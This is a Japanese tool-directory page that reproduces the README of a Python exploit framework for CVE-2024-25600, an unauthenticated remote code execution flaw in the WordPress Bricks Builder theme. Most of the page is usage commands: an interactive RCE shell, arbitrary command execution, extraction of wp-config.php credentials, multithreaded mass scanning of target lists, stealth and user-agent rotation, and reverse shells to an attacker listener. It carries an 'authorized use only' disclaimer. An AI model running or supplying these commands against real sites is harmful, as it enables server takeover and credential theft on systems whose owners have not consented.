Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - WordPress Bricks Builderテーマ向けの未認証RCEエクスプロイト。インタラクティブシェル、リバースシェル、ファイルのアップロード/ダウンロード、非同期スキャン、ステルスモード、プロキシサポート、マルチスレッド脆弱性スキャンを備えた高度なエクスプロイトフレームワーク。認可されたセキュリティテスト専用です。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
偵察脆弱性スキャナーエクスプロイトシェルコードウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロールレッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - WordPress Bricks Builderテーマ向けの未認証RCEエクスプロイト。インタラクティブシェル、リバースシェル、ファイルのアップロード/ダウンロード、非同期スキャン、ステルスモード、プロキシサポート、マルチスレッド脆弱性スキャンを備えた高度なエクスプロイトフレームワーク。認可されたセキュリティテスト専用です。

リポジトリを見る
1152ヶ月前未レビュー

BricksRCE Exploiter(ブリックスRCEエクスプロイター)

CVE-2024-25600 — WordPress Bricks Builder の非認証リモートコード実行脆弱性

Python Version CVSS CVE License Platform

CVE-2024-25600 のための認可されたセキュリティ評価ツール
作成者: Sudeepa Wanigarathna · ツール: BricksRCE Exploiter v1.0
メインスクリプト: cve-2024-25600.py

b

[!IMPORTANT] 認可された使用のみ。 このツールは、セキュリティ研究、教育、および自分が所有するか、明示的な書面による許可を得たシステムのテストを目的としています。コンピュータシステムへの不正アクセスは違法です。作者は誤用に対する責任を負いません。


目次

  • 概要
  • 脆弱性詳細
  • 機能
  • インストール
  • クイックスタート
  • 使用方法ガイド
  • コマンドリファレンス
  • インタラクティブシェル
  • 出力とログ
  • トラブルシューティング
  • リポジトリ構成
  • バージョン履歴
  • 免責事項
  • 作者とクレジット
  • ライセンス

概要

CVE-2024-25600 は、WordPress の Bricks Builder テーマにおける 重大な非認証リモートコード実行 脆弱性です。render_element REST エンドポイントにおけるユーザー制御入力の不適切な処理により、認証されていない攻撃者が影響を受けるインストール環境で任意の PHP / システムコマンドを実行できます。

BricksRCE Exploiter (cve-2024-25600.py) は、認可されたセキュリティ専門家が以下を行うためのフル機能の Python 評価ツールです:

  • 脆弱な Bricks Builder インストールを検出
  • 制御されたコマンド実行で影響を検証
  • インタラクティブシェルを介して侵害されたホストと対話
  • 非同期 / スレッド化ワーカーによるターゲットリストの一括スキャン
  • レポート用に構造化された結果をエクスポート

脆弱性詳細

属性値
CVE IDCVE-2024-25600
CVSS9.8 (Critical)
攻撃ベクトルネットワーク — 認証不要
影響完全なリモートコード実行、機密性 / 完全性 / 可用性の侵害
影響を受ける製品WordPress Bricks Builder テーマ
影響を受けるバージョンBricks ≤ 1.9.6 (パッチ適用済み 1.9.6.1+)
脆弱性タイプ非認証リモートコード実行
CWECWE-94 (コード生成の不適切な制御)

影響を受けるエンドポイント

エンドポイントメソッド
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

攻撃の概要

  1. ターゲットページのソースから Bricks nonce を抽出
  2. 悪意のある element ペイロードを含む細工された render_element リクエストを送信
  3. サーバー側のコード評価により、任意のコマンド実行が発生

参考文献

  • CVE-2024-25600 (MITRE)
  • NVD エントリ
  • Bricks Builder チェンジログ / セキュリティアドバイザリ

機能

コア機能

機能説明
脆弱性検出制御されたマーカーベースのプローブにより RCE を確認
Nonce 抽出複数の方法(スクリプト、ページソース、メタ、REST)での nonce 発見
バージョン検出CSS / readme / REST から Bricks Builder バージョンを識別
インタラクティブシェル履歴、オートコンプリート、ファイル転送機能を備えた完全な REPL
単一コマンドモード1つのコマンドを実行して終了(スクリプト連携に適切)
リバースシェルヘルパーbash / nc / Python / PHP / Perl / Ruby リバースシェルを生成
wp-config 抽出wp-config.php の位置を特定し読み取りを試行
一括スキャンURL リストからの非同期またはスレッド化マルチターゲットスキャン

操作制御

機能説明
レート制限リクエスト間の設定可能な遅延
リトライロジックタイムアウトや接続エラー時の指数バックオフ
User-Agent ローテーションリクエストごとのランダムなブラウザフィンガープリント
ステルスモードランダム化された Accept-Language / Accept-Encoding ヘッダー
プロキシサポートHTTP, HTTPS, SOCKS5 / SOCKS5h
デュアルエンドポイントwp-json と rest_route の両方、または一方を優先
フォースモード事前チェックをスキップし直接エクスプロイトを試行
リッチ CLIRich ライブラリによるプログレスバー、テーブル、色付きパネル

レポート

機能説明
JSON / TXT エクスポートスキャン結果と脆弱なターゲットを保存
コマンド履歴実行されたコマンドのオプションログ
ファイルログ永続的な bricks_rce.log およびカスタムログパス

インストール

前提条件

  • Python 3.8+
  • pip
  • 認可されたターゲットへのネットワーク到達性

セットアップ

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

依存関係

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # オプション — SOCKS5 プロキシサポート

クイックスタート

https://target.example は ラボまたは認可された ターゲットのみに置き換えてください。

# インタラクティブシェル
python3 cve-2024-25600.py -u https://target.example

# 単一コマンド
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# 一括スキャン
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# バージョン検出
python3 cve-2024-25600.py -u https://target.example --detect-version

# Burp プロキシ経由
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

使用方法ガイド

すべての例はメインスクリプト cve-2024-25600.py を使用しています。

1. ヘルプの表示

python3 cve-2024-25600.py --help

2. シングルターゲットのインタラクティブシェル

ターゲットが脆弱であることを確認した後、インタラクティブな RCE シェルを開きます。

python3 cve-2024-25600.py -u https://target.example

ワークフロー:

  1. URL を正規化し検証
  2. ページから nonce を抽出
  3. 脆弱性を確認(--force が指定されていない場合)
  4. インタラクティブシェルに入る

3. 単一コマンドの実行

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

コマンド出力をファイルに保存:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. ペイロードタイプの選択

# デフォルトの PHP 例外ベースのペイロード
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() ベースのペイロード
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Bricks Builder バージョンの検出

python3 cve-2024-25600.py -u https://target.example --detect-version

コマンドと組み合わせる:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. wp-config.php の抽出

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

成功すると wp-config_<ターゲット>.txt として保存されます。

7. リバースシェル (認可されたラボのみ)

# 端末 1 — リスナー
nc -lvnp 4444

# 端末 2 — bash リバースシェル
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

サポートされているすべてのリバースシェルタイプ:

python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. フォースモード (脆弱性チェックをスキップ)

python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. ファイルからの一括スキャン

# targets.txt — 1行に1URL
python3 cve-2024-25600.py -f targets.txt

スレッド、遅延、ステルス、JSON 出力を指定:

python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

非同期ではなく同期(スレッドプール)スキャン:

python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

サイレント一括スキャン:

python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. エンドポイントの選択

# 両方のエンドポイント (デフォルト)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# /wp-json/bricks/v1/render_element のみ
python3 cve-2024-25600.py -u https://target.example --endpoint json

# /?rest_route=/bricks/v1/render_element のみ
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. ステルスモード

ツールをダウンロード